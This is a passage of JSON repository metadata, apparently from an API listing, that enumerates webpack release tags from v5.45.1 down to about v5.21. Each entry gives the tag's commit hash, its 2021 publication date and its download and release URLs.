5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21